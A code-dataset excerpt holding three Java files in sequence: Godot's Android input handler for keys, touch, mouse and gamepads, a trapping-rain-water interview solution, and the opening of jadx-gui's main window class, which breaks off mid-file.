/* CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, */
/* TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE */
/* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */
/**************************************************************************/
package org.godotengine.godot.input;
import static org.godotengine.godot.utils.GLUtils.DEBUG;
import org.godotengine.godot.GodotLib;
import org.godotengine.godot.GodotRenderView;
import android.content.Context;
import android.hardware.input.InputManager;
import android.os.Build;
import android.util.Log;
import android.util.SparseArray;
import android.util.SparseIntArray;
import android.view.GestureDetector;
import android.view.InputDevice;
import android.view.KeyEvent;
import android.view.MotionEvent;
import android.view.ScaleGestureDetector;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;
/**
* Handles input related events for the {@link GodotRenderView} view.
*/
public class GodotInputHandler implements InputManager.InputDeviceListener {
private static final String TAG = GodotInputHandler.class.getSimpleName();
private static final int ROTARY_INPUT_VERTICAL_AXIS = 1;
private static final int ROTARY_INPUT_HORIZONTAL_AXIS = 0;
private final SparseIntArray mJoystickIds = new SparseIntArray(4);
private final SparseArray<Joystick> mJoysticksDevices = new SparseArray<>(4);
private final GodotRenderView mRenderView;
private final InputManager mInputManager;
private final GestureDetector gestureDetector;
private final ScaleGestureDetector scaleGestureDetector;
private final GodotGestureHandler godotGestureHandler;
/**
* Used to decide whether mouse capture can be enabled.
*/
private int lastSeenToolType = MotionEvent.TOOL_TYPE_UNKNOWN;
private static int rotaryInputAxis = ROTARY_INPUT_VERTICAL_AXIS;
public GodotInputHandler(GodotRenderView godotView) {
final Context context = godotView.getView().getContext();
mRenderView = godotView;
mInputManager = (InputManager)context.getSystemService(Context.INPUT_SERVICE);
mInputManager.registerInputDeviceListener(this, null);
this.godotGestureHandler = new GodotGestureHandler();
this.gestureDetector = new GestureDetector(context, godotGestureHandler);
this.gestureDetector.setIsLongpressEnabled(false);
this.scaleGestureDetector = new ScaleGestureDetector(context, godotGestureHandler);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
this.scaleGestureDetector.setStylusScaleEnabled(true);
}
}
/**
* Enable long press events. This is false by default.
*/
public void enableLongPress(boolean enable) {
this.gestureDetector.setIsLongpressEnabled(enable);
}
/**
* Enable multi-fingers pan & scale gestures. This is false by default.
* <p>
* Note: This may interfere with multi-touch handling / support.
*/
public void enablePanningAndScalingGestures(boolean enable) {
this.godotGestureHandler.setPanningAndScalingEnabled(enable);
}
/**
* On Wear OS devices, sets which axis of the mouse wheel rotary input is mapped to. This is 1 (vertical axis) by default.
*/
public void setRotaryInputAxis(int axis) {
rotaryInputAxis = axis;
}
private boolean isKeyEventGameDevice(int source) {
// Note that keyboards are often (SOURCE_KEYBOARD | SOURCE_DPAD)
if (source == (InputDevice.SOURCE_KEYBOARD | InputDevice.SOURCE_DPAD))
return false;
return (source & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK || (source & InputDevice.SOURCE_DPAD) == InputDevice.SOURCE_DPAD || (source & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD;
}
public boolean canCapturePointer() {
return lastSeenToolType == MotionEvent.TOOL_TYPE_MOUSE;
}
public void onPointerCaptureChange(boolean hasCapture) {
godotGestureHandler.onPointerCaptureChange(hasCapture);
}
public boolean onKeyUp(final int keyCode, KeyEvent event) {
if (keyCode == KeyEvent.KEYCODE_BACK) {
return true;
}
if (keyCode == KeyEvent.KEYCODE_VOLUME_UP || keyCode == KeyEvent.KEYCODE_VOLUME_DOWN) {
return false;
}
int source = event.getSource();
if (isKeyEventGameDevice(source)) {
// Check if the device exists
final int deviceId = event.getDeviceId();
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
final int button = getGodotButton(keyCode);
final int godotJoyId = mJoystickIds.get(deviceId);
GodotLib.joybutton(godotJoyId, button, false);
}
} else {
// getKeyCode(): The physical key that was pressed.
final int physical_keycode = event.getKeyCode();
final int unicode = event.getUnicodeChar();
final int key_label = event.getDisplayLabel();
GodotLib.key(physical_keycode, unicode, key_label, false, event.getRepeatCount() > 0);
};
return true;
}
public boolean onKeyDown(final int keyCode, KeyEvent event) {
if (keyCode == KeyEvent.KEYCODE_BACK) {
mRenderView.onBackPressed();
// press 'back' button should not terminate program
//normal handle 'back' event in game logic
return true;
}
if (keyCode == KeyEvent.KEYCODE_VOLUME_UP || keyCode == KeyEvent.KEYCODE_VOLUME_DOWN) {
return false;
}
int source = event.getSource();
final int deviceId = event.getDeviceId();
// Check if source is a game device and that the device is a registered gamepad
if (isKeyEventGameDevice(source)) {
if (event.getRepeatCount() > 0) // ignore key echo
return true;
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
final int button = getGodotButton(keyCode);
final int godotJoyId = mJoystickIds.get(deviceId);
GodotLib.joybutton(godotJoyId, button, true);
}
} else {
final int physical_keycode = event.getKeyCode();
final int unicode = event.getUnicodeChar();
final int key_label = event.getDisplayLabel();
GodotLib.key(physical_keycode, unicode, key_label, true, event.getRepeatCount() > 0);
}
return true;
}
public boolean onTouchEvent(final MotionEvent event) {
lastSeenToolType = event.getToolType(0);
this.scaleGestureDetector.onTouchEvent(event);
if (this.gestureDetector.onTouchEvent(event)) {
// The gesture detector has handled the event.
return true;
}
if (godotGestureHandler.onMotionEvent(event)) {
// The gesture handler has handled the event.
return true;
}
// Drag events are handled by the [GodotGestureHandler]
if (event.getActionMasked() == MotionEvent.ACTION_MOVE) {
return true;
}
if (isMouseEvent(event)) {
return handleMouseEvent(event);
}
return handleTouchEvent(event);
}
public boolean onGenericMotionEvent(MotionEvent event) {
lastSeenToolType = event.getToolType(0);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M && gestureDetector.onGenericMotionEvent(event)) {
// The gesture detector has handled the event.
return true;
}
if (godotGestureHandler.onMotionEvent(event)) {
// The gesture handler has handled the event.
return true;
}
if (event.isFromSource(InputDevice.SOURCE_JOYSTICK) && event.getActionMasked() == MotionEvent.ACTION_MOVE) {
// Check if the device exists
final int deviceId = event.getDeviceId();
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
final int godotJoyId = mJoystickIds.get(deviceId);
Joystick joystick = mJoysticksDevices.get(deviceId);
if (joystick == null) {
return true;
}
for (int i = 0; i < joystick.axes.size(); i++) {
final int axis = joystick.axes.get(i);
final float value = event.getAxisValue(axis);
/*
As all axes are polled for each event, only fire an axis event if the value has actually changed.
Prevents flooding Godot with repeated events.
*/
if (joystick.axesValues.indexOfKey(axis) < 0 || (float)joystick.axesValues.get(axis) != value) {
// save value to prevent repeats
joystick.axesValues.put(axis, value);
GodotLib.joyaxis(godotJoyId, i, value);
}
}
if (joystick.hasAxisHat) {
final int hatX = Math.round(event.getAxisValue(MotionEvent.AXIS_HAT_X));
final int hatY = Math.round(event.getAxisValue(MotionEvent.AXIS_HAT_Y));
if (joystick.hatX != hatX || joystick.hatY != hatY) {
joystick.hatX = hatX;
joystick.hatY = hatY;
GodotLib.joyhat(godotJoyId, hatX, hatY);
}
}
return true;
}
} else {
return handleMouseEvent(event);
}
return false;
}
public void initInputDevices() {
/* initially add input devices*/
int[] deviceIds = mInputManager.getInputDeviceIds();
for (int deviceId : deviceIds) {
InputDevice device = mInputManager.getInputDevice(deviceId);
if (DEBUG) {
Log.v(TAG, String.format("init() deviceId:%d, Name:%s\n", deviceId, device.getName()));
}
onInputDeviceAdded(deviceId);
}
}
private int assignJoystickIdNumber(int deviceId) {
int godotJoyId = 0;
while (mJoystickIds.indexOfValue(godotJoyId) >= 0) {
godotJoyId++;
}
mJoystickIds.put(deviceId, godotJoyId);
return godotJoyId;
}
@Override
public void onInputDeviceAdded(int deviceId) {
// Check if the device has not been already added
if (mJoystickIds.indexOfKey(deviceId) >= 0) {
return;
}
InputDevice device = mInputManager.getInputDevice(deviceId);
//device can be null if deviceId is not found
if (device == null) {
return;
}
int sources = device.getSources();
// Device may not be a joystick or gamepad
if ((sources & InputDevice.SOURCE_GAMEPAD) != InputDevice.SOURCE_GAMEPAD &&
(sources & InputDevice.SOURCE_JOYSTICK) != InputDevice.SOURCE_JOYSTICK) {
return;
}
// Assign first available number. Reuse numbers where possible.
final int id = assignJoystickIdNumber(deviceId);
final Joystick joystick = new Joystick();
joystick.device_id = deviceId;
joystick.name = device.getName();
//Helps with creating new joypad mappings.
Log.i(TAG, "=== New Input Device: " + joystick.name);
Set<Integer> already = new HashSet<>();
for (InputDevice.MotionRange range : device.getMotionRanges()) {
boolean isJoystick = range.isFromSource(InputDevice.SOURCE_JOYSTICK);
boolean isGamepad = range.isFromSource(InputDevice.SOURCE_GAMEPAD);
if (!isJoystick && !isGamepad) {
continue;
}
final int axis = range.getAxis();
if (axis == MotionEvent.AXIS_HAT_X || axis == MotionEvent.AXIS_HAT_Y) {
joystick.hasAxisHat = true;
} else {
if (!already.contains(axis)) {
already.add(axis);
joystick.axes.add(axis);
} else {
Log.w(TAG, " - DUPLICATE AXIS VALUE IN LIST: " + axis);
}
}
}
Collections.sort(joystick.axes);
for (int idx = 0; idx < joystick.axes.size(); idx++) {
//Helps with creating new joypad mappings.
Log.i(TAG, " - Mapping Android axis " + joystick.axes.get(idx) + " to Godot axis " + idx);
}
mJoysticksDevices.put(deviceId, joystick);
GodotLib.joyconnectionchanged(id, true, joystick.name);
}
@Override
public void onInputDeviceRemoved(int deviceId) {
// Check if the device has not been already removed
if (mJoystickIds.indexOfKey(deviceId) < 0) {
return;
}
final int godotJoyId = mJoystickIds.get(deviceId);
mJoystickIds.delete(deviceId);
mJoysticksDevices.delete(deviceId);
GodotLib.joyconnectionchanged(godotJoyId, false, "");
}
@Override
public void onInputDeviceChanged(int deviceId) {
onInputDeviceRemoved(deviceId);
onInputDeviceAdded(deviceId);
}
public static int getGodotButton(int keyCode) {
int button;
switch (keyCode) {
case KeyEvent.KEYCODE_BUTTON_A: // Android A is SNES B
button = 0;
break;
case KeyEvent.KEYCODE_BUTTON_B:
button = 1;
break;
case KeyEvent.KEYCODE_BUTTON_X: // Android X is SNES Y
button = 2;
break;
case KeyEvent.KEYCODE_BUTTON_Y:
button = 3;
break;
case KeyEvent.KEYCODE_BUTTON_L1:
button = 9;
break;
case KeyEvent.KEYCODE_BUTTON_L2:
button = 15;
break;
case KeyEvent.KEYCODE_BUTTON_R1:
button = 10;
break;
case KeyEvent.KEYCODE_BUTTON_R2:
button = 16;
break;
case KeyEvent.KEYCODE_BUTTON_SELECT:
button = 4;
break;
case KeyEvent.KEYCODE_BUTTON_START:
button = 6;
break;
case KeyEvent.KEYCODE_BUTTON_THUMBL:
button = 7;
break;
case KeyEvent.KEYCODE_BUTTON_THUMBR:
button = 8;
break;
case KeyEvent.KEYCODE_DPAD_UP:
button = 11;
break;
case KeyEvent.KEYCODE_DPAD_DOWN:
button = 12;
break;
case KeyEvent.KEYCODE_DPAD_LEFT:
button = 13;
break;
case KeyEvent.KEYCODE_DPAD_RIGHT:
button = 14;
break;
case KeyEvent.KEYCODE_BUTTON_C:
button = 17;
break;
case KeyEvent.KEYCODE_BUTTON_Z:
button = 18;
break;
default:
button = keyCode - KeyEvent.KEYCODE_BUTTON_1 + 20;
break;
}
return button;
}
static boolean isMouseEvent(MotionEvent event) {
return isMouseEvent(event.getSource());
}
private static boolean isMouseEvent(int eventSource) {
boolean mouseSource = ((eventSource & InputDevice.SOURCE_MOUSE) == InputDevice.SOURCE_MOUSE) || ((eventSource & InputDevice.SOURCE_STYLUS) == InputDevice.SOURCE_STYLUS);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
mouseSource = mouseSource || ((eventSource & InputDevice.SOURCE_MOUSE_RELATIVE) == InputDevice.SOURCE_MOUSE_RELATIVE);
}
return mouseSource;
}
static boolean handleMotionEvent(final MotionEvent event) {
if (isMouseEvent(event)) {
return handleMouseEvent(event);
}
return handleTouchEvent(event);
}
static boolean handleMotionEvent(int eventSource, int eventAction, int buttonsMask, float x, float y) {
return handleMotionEvent(eventSource, eventAction, buttonsMask, x, y, false);
}
static boolean handleMotionEvent(int eventSource, int eventAction, int buttonsMask, float x, float y, boolean doubleTap) {
return handleMotionEvent(eventSource, eventAction, buttonsMask, x, y, 0, 0, doubleTap);
}
static boolean handleMotionEvent(int eventSource, int eventAction, int buttonsMask, float x, float y, float deltaX, float deltaY, boolean doubleTap) {
if (isMouseEvent(eventSource)) {
return handleMouseEvent(eventAction, buttonsMask, x, y, deltaX, deltaY, doubleTap, false);
}
return handleTouchEvent(eventAction, x, y, doubleTap);
}
static boolean handleMouseEvent(final MotionEvent event) {
final int eventAction = event.getActionMasked();
final float x = event.getX();
final float y = event.getY();
final int buttonsMask = event.getButtonState();
final float pressure = event.getPressure();
// Orientation is returned as a radian value between 0 to pi clockwise or 0 to -pi counterclockwise.
final float orientation = event.getOrientation();
// Tilt is zero is perpendicular to the screen and pi/2 is flat on the surface.
final float tilt = event.getAxisValue(MotionEvent.AXIS_TILT);
float tiltMult = (float)Math.sin(tilt);
// To be consistent with expected tilt.
final float tiltX = (float)-Math.sin(orientation) * tiltMult;
final float tiltY = (float)Math.cos(orientation) * tiltMult;
float verticalFactor = 0;
float horizontalFactor = 0;
// If event came from RotaryEncoder (Bezel or Crown rotate event on Wear OS smart watches),
// convert it to mouse wheel event.
if (event.isFromSource(InputDevice.SOURCE_ROTARY_ENCODER)) {
if (rotaryInputAxis == ROTARY_INPUT_HORIZONTAL_AXIS) {
horizontalFactor = -event.getAxisValue(MotionEvent.AXIS_SCROLL);
} else {
// If rotaryInputAxis is not ROTARY_INPUT_HORIZONTAL_AXIS then use default ROTARY_INPUT_VERTICAL_AXIS axis.
verticalFactor = -event.getAxisValue(MotionEvent.AXIS_SCROLL);
}
} else {
verticalFactor = event.getAxisValue(MotionEvent.AXIS_VSCROLL);
horizontalFactor = event.getAxisValue(MotionEvent.AXIS_HSCROLL);
}
boolean sourceMouseRelative = false;
if (android.os.Build.VERSION.SDK_INT >= android.os.Build.VERSION_CODES.O) {
sourceMouseRelative = event.isFromSource(InputDevice.SOURCE_MOUSE_RELATIVE);
}
return handleMouseEvent(eventAction, buttonsMask, x, y, horizontalFactor, verticalFactor, false, sourceMouseRelative, pressure, tiltX, tiltY);
}
static boolean handleMouseEvent(int eventAction, int buttonsMask, float x, float y) {
return handleMouseEvent(eventAction, buttonsMask, x, y, 0, 0, false, false);
}
static boolean handleMouseEvent(int eventAction, int buttonsMask, float x, float y, float deltaX, float deltaY, boolean doubleClick, boolean sourceMouseRelative) {
return handleMouseEvent(eventAction, buttonsMask, x, y, deltaX, deltaY, doubleClick, sourceMouseRelative, 1, 0, 0);
}
static boolean handleMouseEvent(int eventAction, int buttonsMask, float x, float y, float deltaX, float deltaY, boolean doubleClick, boolean sourceMouseRelative, float pressure, float tiltX, float tiltY) {
// Fix the buttonsMask
switch (eventAction) {
case MotionEvent.ACTION_CANCEL:
case MotionEvent.ACTION_UP:
// Zero-up the button state
buttonsMask = 0;
break;
case MotionEvent.ACTION_DOWN:
case MotionEvent.ACTION_MOVE:
if (buttonsMask == 0) {
buttonsMask = MotionEvent.BUTTON_PRIMARY;
}
break;
}
// We don't handle ACTION_BUTTON_PRESS and ACTION_BUTTON_RELEASE events as they typically
// follow ACTION_DOWN and ACTION_UP events. As such, handling them would result in duplicate
// stream of events to the engine.
switch (eventAction) {
case MotionEvent.ACTION_CANCEL:
case MotionEvent.ACTION_UP:
case MotionEvent.ACTION_DOWN:
case MotionEvent.ACTION_HOVER_ENTER:
case MotionEvent.ACTION_HOVER_EXIT:
case MotionEvent.ACTION_HOVER_MOVE:
case MotionEvent.ACTION_MOVE:
case MotionEvent.ACTION_SCROLL: {
GodotLib.dispatchMouseEvent(eventAction, buttonsMask, x, y, deltaX, deltaY, doubleClick, sourceMouseRelative, pressure, tiltX, tiltY);
return true;
}
}
return false;
}
static boolean handleTouchEvent(final MotionEvent event) {
final int pointerCount = event.getPointerCount();
if (pointerCount == 0) {
return true;
}
final float[] positions = new float[pointerCount * 3]; // pointerId1, x1, y1, pointerId2, etc...
for (int i = 0; i < pointerCount; i++) {
positions[i * 3 + 0] = event.getPointerId(i);
positions[i * 3 + 1] = event.getX(i);
positions[i * 3 + 2] = event.getY(i);
}
final int action = event.getActionMasked();
final int actionPointerId = event.getPointerId(event.getActionIndex());
return handleTouchEvent(action, actionPointerId, pointerCount, positions, false);
}
static boolean handleTouchEvent(int eventAction, float x, float y, boolean doubleTap) {
return handleTouchEvent(eventAction, 0, 1, new float[] { 0, x, y }, doubleTap);
}
static boolean handleTouchEvent(int eventAction, int actionPointerId, int pointerCount, float[] positions, boolean doubleTap) {
switch (eventAction) {
case MotionEvent.ACTION_DOWN:
case MotionEvent.ACTION_CANCEL:
case MotionEvent.ACTION_UP:
case MotionEvent.ACTION_MOVE:
case MotionEvent.ACTION_POINTER_UP:
case MotionEvent.ACTION_POINTER_DOWN: {
GodotLib.dispatchTouchEvent(eventAction, actionPointerId, pointerCount, positions, doubleTap);
return true;
}
}
return false;
}
}
| godotengine/godot | platform/android/java/lib/src/org/godotengine/godot/input/GodotInputHandler.java |
1,014 | // Given n non-negative integers representing an elevation map where the width of each bar is 1, compute how much water it is able to trap after raining.
// For example,
// Given [0,1,0,2,1,0,1,3,2,1,2,1], return 6.
public class TrappingRainWater {
public int trap(int[] height) {
int water = 0;
int leftIndex = 0;
int rightIndex = height.length - 1;
int leftMax = 0;
int rightMax = 0;
while(leftIndex <= rightIndex) {
leftMax = Math.max(leftMax, height[leftIndex]);
rightMax = Math.max(rightMax, height[rightIndex]);
if(leftMax < rightMax) {
water += leftMax - height[leftIndex];
leftIndex++;
} else {
water += rightMax - height[rightIndex];
rightIndex--;
}
}
return water;
}
}
| kdn251/interviews | company/twitter/TrappingRainWater.java |
1,017 | package jadx.gui.ui;
import java.awt.BorderLayout;
import java.awt.Component;
import java.awt.Dimension;
import java.awt.DisplayMode;
import java.awt.Font;
import java.awt.GraphicsDevice;
import java.awt.GraphicsEnvironment;
import java.awt.Rectangle;
import java.awt.dnd.DnDConstants;
import java.awt.dnd.DropTarget;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.awt.event.FocusAdapter;
import java.awt.event.FocusEvent;
import java.awt.event.KeyAdapter;
import java.awt.event.KeyEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.awt.event.WindowAdapter;
import java.awt.event.WindowEvent;
import java.awt.geom.AffineTransform;
import java.io.InputStream;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.EnumSet;
import java.util.List;
import java.util.Locale;
import java.util.Timer;
import java.util.TimerTask;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.Consumer;
import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.Box;
import javax.swing.ImageIcon;
import javax.swing.JCheckBox;
import javax.swing.JCheckBoxMenuItem;
import javax.swing.JDialog;
import javax.swing.JFileChooser;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JMenu;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JPopupMenu;
import javax.swing.JScrollPane;
import javax.swing.JSplitPane;
import javax.swing.JToggleButton;
import javax.swing.JToolBar;
import javax.swing.JTree;
import javax.swing.SwingUtilities;
import javax.swing.ToolTipManager;
import javax.swing.WindowConstants;
import javax.swing.event.TreeExpansionEvent;
import javax.swing.event.TreeWillExpandListener;
import javax.swing.tree.DefaultMutableTreeNode;
import javax.swing.tree.DefaultTreeCellRenderer;
import javax.swing.tree.DefaultTreeModel;
import javax.swing.tree.TreeNode;
import javax.swing.tree.TreePath;
import javax.swing.tree.TreeSelectionModel;
import org.fife.ui.rsyntaxtextarea.RSyntaxTextArea;
import org.fife.ui.rsyntaxtextarea.Theme;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import ch.qos.logback.classic.Level;
import jadx.api.JadxArgs;
import jadx.api.JadxDecompiler;
import jadx.api.JavaClass;
import jadx.api.JavaNode;
import jadx.api.ResourceFile;
import jadx.api.plugins.events.IJadxEvents;
import jadx.api.plugins.events.JadxEvents;
import jadx.api.plugins.events.types.ReloadProject;
import jadx.api.plugins.utils.CommonFileUtils;
import jadx.core.Jadx;
import jadx.core.export.TemplateFile;
import jadx.core.plugins.events.JadxEventsImpl;
import jadx.core.utils.ListUtils;
import jadx.core.utils.StringUtils;
import jadx.core.utils.android.AndroidManifestParser;
import jadx.core.utils.android.AppAttribute;
import jadx.core.utils.android.ApplicationParams;
import jadx.core.utils.exceptions.JadxRuntimeException;
import jadx.core.utils.files.FileUtils;
import jadx.gui.JadxWrapper;
import jadx.gui.cache.manager.CacheManager;
import jadx.gui.device.debugger.BreakpointManager;
import jadx.gui.events.services.RenameService;
import jadx.gui.jobs.BackgroundExecutor;
import jadx.gui.jobs.DecompileTask;
import jadx.gui.jobs.ExportTask;
import jadx.gui.jobs.TaskStatus;
import jadx.gui.logs.LogCollector;
import jadx.gui.logs.LogOptions;
import jadx.gui.logs.LogPanel;
import jadx.gui.plugins.mappings.RenameMappingsGui;
import jadx.gui.plugins.quark.QuarkDialog;
import jadx.gui.settings.JadxProject;
import jadx.gui.settings.JadxSettings;
import jadx.gui.settings.ui.JadxSettingsWindow;
import jadx.gui.settings.ui.plugins.PluginSettings;
import jadx.gui.treemodel.ApkSignature;
import jadx.gui.treemodel.JClass;
import jadx.gui.treemodel.JLoadableNode;
import jadx.gui.treemodel.JNode;
import jadx.gui.treemodel.JPackage;
import jadx.gui.treemodel.JResource;
import jadx.gui.treemodel.JRoot;
import jadx.gui.ui.action.ActionModel;
import jadx.gui.ui.action.JadxGuiAction;
import jadx.gui.ui.codearea.AbstractCodeArea;
import jadx.gui.ui.codearea.AbstractCodeContentPanel;
import jadx.gui.ui.codearea.EditorTheme;
import jadx.gui.ui.codearea.EditorViewState;
import jadx.gui.ui.dialog.ADBDialog;
import jadx.gui.ui.dialog.AboutDialog;
import jadx.gui.ui.dialog.LogViewerDialog;
import jadx.gui.ui.dialog.SearchDialog;
import jadx.gui.ui.filedialog.FileDialogWrapper;
import jadx.gui.ui.filedialog.FileOpenMode;
import jadx.gui.ui.menu.HiddenMenuItem;
import jadx.gui.ui.menu.JadxMenu;
import jadx.gui.ui.menu.JadxMenuBar;
import jadx.gui.ui.panel.ContentPanel;
import jadx.gui.ui.panel.IssuesPanel;
import jadx.gui.ui.panel.JDebuggerPanel;
import jadx.gui.ui.panel.ProgressPanel;
import jadx.gui.ui.popupmenu.RecentProjectsMenuListener;
import jadx.gui.ui.tab.TabbedPane;
import jadx.gui.ui.tab.dnd.TabDndController;
import jadx.gui.ui.treenodes.StartPageNode;
import jadx.gui.ui.treenodes.SummaryNode;
import jadx.gui.update.JadxUpdate;
import jadx.gui.update.JadxUpdate.IUpdateCallback;
import jadx.gui.update.data.Release;
import jadx.gui.utils.CacheObject;
import jadx.gui.utils.FontUtils;
import jadx.gui.utils.ILoadListener;
import jadx.gui.utils.LafManager;
import jadx.gui.utils.Link;
import jadx.gui.utils.NLS;
import jadx.gui.utils.UiUtils;
import jadx.gui.utils.fileswatcher.LiveReloadWorker;
import jadx.gui.utils.shortcut.ShortcutsController;
import jadx.gui.utils.ui.ActionHandler;
import jadx.gui.utils.ui.NodeLabel;
import static io.reactivex.internal.functions.Functions.EMPTY_RUNNABLE;
public class MainWindow extends JFrame {
private static final Logger LOG = LoggerFactory.getLogger(MainWindow.class);
private static final String DEFAULT_TITLE = "jadx-gui";
private static final double BORDER_RATIO = 0.15;
private static final double WINDOW_RATIO = 1 - BORDER_RATIO * 2;
public static final double SPLIT_PANE_RESIZE_WEIGHT = 0.15;
private static final ImageIcon ICON_ADD_FILES = UiUtils.openSvgIcon("ui/addFile");
private static final ImageIcon ICON_RELOAD = UiUtils.openSvgIcon("ui/refresh");
private static final ImageIcon ICON_EXPORT = UiUtils.openSvgIcon("ui/export");
private static final ImageIcon ICON_EXIT = UiUtils.openSvgIcon("ui/exit");
private static final ImageIcon ICON_SYNC = UiUtils.openSvgIcon("ui/pagination");
private static final ImageIcon ICON_FLAT_PKG = UiUtils.openSvgIcon("ui/moduleGroup");
private static final ImageIcon ICON_SEARCH = UiUtils.openSvgIcon("ui/find");
private static final ImageIcon ICON_FIND = UiUtils.openSvgIcon("ui/ejbFinderMethod");
private static final ImageIcon ICON_COMMENT_SEARCH = UiUtils.openSvgIcon("ui/usagesFinder");
private static final ImageIcon ICON_MAIN_ACTIVITY = UiUtils.openSvgIcon("ui/home");
private static final ImageIcon ICON_BACK = UiUtils.openSvgIcon("ui/left");
private static final ImageIcon ICON_FORWARD = UiUtils.openSvgIcon("ui/right");
private static final ImageIcon ICON_QUARK = UiUtils.openSvgIcon("ui/quark");
private static final ImageIcon ICON_PREF = UiUtils.openSvgIcon("ui/settings");
private static final ImageIcon ICON_DEOBF = UiUtils.openSvgIcon("ui/helmChartLock");
private static final ImageIcon ICON_DECOMPILE_ALL = UiUtils.openSvgIcon("ui/runAll");
private static final ImageIcon ICON_LOG = UiUtils.openSvgIcon("ui/logVerbose");
private static final ImageIcon ICON_INFO = UiUtils.openSvgIcon("ui/showInfos");
private static final ImageIcon ICON_DEBUGGER = UiUtils.openSvgIcon("ui/startDebugger");
private final transient JadxWrapper wrapper;
private final transient JadxSettings settings;
private final transient CacheObject cacheObject;
private final transient CacheManager cacheManager;
private final transient BackgroundExecutor backgroundExecutor;
private transient @NotNull JadxProject project;
private transient JadxGuiAction newProjectAction;
private transient JadxGuiAction saveProjectAction;
private transient JPanel mainPanel;
private transient JSplitPane treeSplitPane;
private transient JSplitPane rightSplitPane;
private transient JSplitPane bottomSplitPane;
private JTree tree;
private DefaultTreeModel treeModel;
private JRoot treeRoot;
private TabbedPane tabbedPane;
private HeapUsageBar heapUsageBar;
private transient boolean treeReloading;
private boolean isFlattenPackage;
private JToggleButton flatPkgButton;
private JCheckBoxMenuItem flatPkgMenuItem;
private JToggleButton deobfToggleBtn;
private JCheckBoxMenuItem deobfMenuItem;
private JCheckBoxMenuItem liveReloadMenuItem;
private final LiveReloadWorker liveReloadWorker;
private transient Link updateLink;
private transient ProgressPanel progressPane;
private transient Theme editorTheme;
private transient IssuesPanel issuesPanel;
private transient @Nullable LogPanel logPanel;
private transient @Nullable JDebuggerPanel debuggerPanel;
private final List<ILoadListener> loadListeners = new ArrayList<>();
private final List<Consumer<JRoot>> treeUpdateListener = new ArrayList<>();
private boolean loaded;
private boolean settingsOpen = false;
private ShortcutsController shortcutsController;
private JadxMenuBar menuBar;
private JMenu pluginsMenu;
private final transient RenameMappingsGui renameMappings;
public MainWindow(JadxSettings settings) {
this.settings = settings;
this.cacheObject = new CacheObject();
this.project = new JadxProject(this);
this.wrapper = new JadxWrapper(this);
this.liveReloadWorker = new LiveReloadWorker(this);
this.renameMappings = new RenameMappingsGui(this);
this.cacheManager = new CacheManager(settings);
this.shortcutsController = new ShortcutsController(settings);
resetCache();
FontUtils.registerBundledFonts();
setEditorTheme(settings.getEditorThemePath());
initUI();
this.backgroundExecutor = new BackgroundExecutor(settings, progressPane);
initMenuAndToolbar();
UiUtils.setWindowIcons(this);
shortcutsController.registerMouseEventListener(this);
loadSettings();
update();
checkForUpdate();
}
public void init() {
pack();
setLocationAndPosition();
treeSplitPane.setDividerLocation(settings.getTreeWidth());
heapUsageBar.setVisible(settings.isShowHeapUsageBar());
setVisible(true);
setDefaultCloseOperation(WindowConstants.DO_NOTHING_ON_CLOSE);
addWindowListener(new WindowAdapter() {
@Override
public void windowClosing(WindowEvent e) {
closeWindow();
}
});
processCommandLineArgs();
}
private void processCommandLineArgs() {
if (settings.getFiles().isEmpty()) {
tabbedPane.showNode(new StartPageNode());
} else {
open(FileUtils.fileNamesToPaths(settings.getFiles()), this::handleSelectClassOption);
}
}
private void handleSelectClassOption() {
if (settings.getCmdSelectClass() != null) {
JavaNode javaNode = wrapper.searchJavaClassByFullAlias(settings.getCmdSelectClass());
if (javaNode == null) {
javaNode = wrapper.searchJavaClassByOrigClassName(settings.getCmdSelectClass());
}
if (javaNode == null) {
JOptionPane.showMessageDialog(this,
NLS.str("msg.cmd_select_class_error", settings.getCmdSelectClass()),
NLS.str("error_dialog.title"), JOptionPane.ERROR_MESSAGE);
return;
}
tabbedPane.codeJump(cacheObject.getNodeCache().makeFrom(javaNode));
}
}
private void checkForUpdate() {
if (!settings.isCheckForUpdates()) {
return;
}
JadxUpdate.check(new IUpdateCallback() {
@Override
public void onUpdate(Release r) {
SwingUtilities.invokeLater(() -> {
updateLink.setText(NLS.str("menu.update_label", r.getName()));
updateLink.setVisible(true);
});
}
});
}
public void openFileDialog() {
showOpenDialog(FileOpenMode.OPEN);
}
public void openProjectDialog() {
showOpenDialog(FileOpenMode.OPEN_PROJECT);
}
private void showOpenDialog(FileOpenMode mode) {
saveAll();
if (!ensureProjectIsSaved()) {
return;
}
FileDialogWrapper fileDialog = new FileDialogWrapper(this, mode);
List<Path> openPaths = fileDialog.show();
if (!openPaths.isEmpty()) {
settings.setLastOpenFilePath(fileDialog.getCurrentDir());
open(openPaths);
}
}
public void addFiles() {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.ADD);
List<Path> addPaths = fileDialog.show();
if (!addPaths.isEmpty()) {
addFiles(addPaths);
}
}
public void addFiles(List<Path> addPaths) {
project.setFilePaths(ListUtils.distinctMergeSortedLists(addPaths, project.getFilePaths()));
reopen();
}
private void newProject() {
saveAll();
if (!ensureProjectIsSaved()) {
return;
}
closeAll();
updateProject(new JadxProject(this));
}
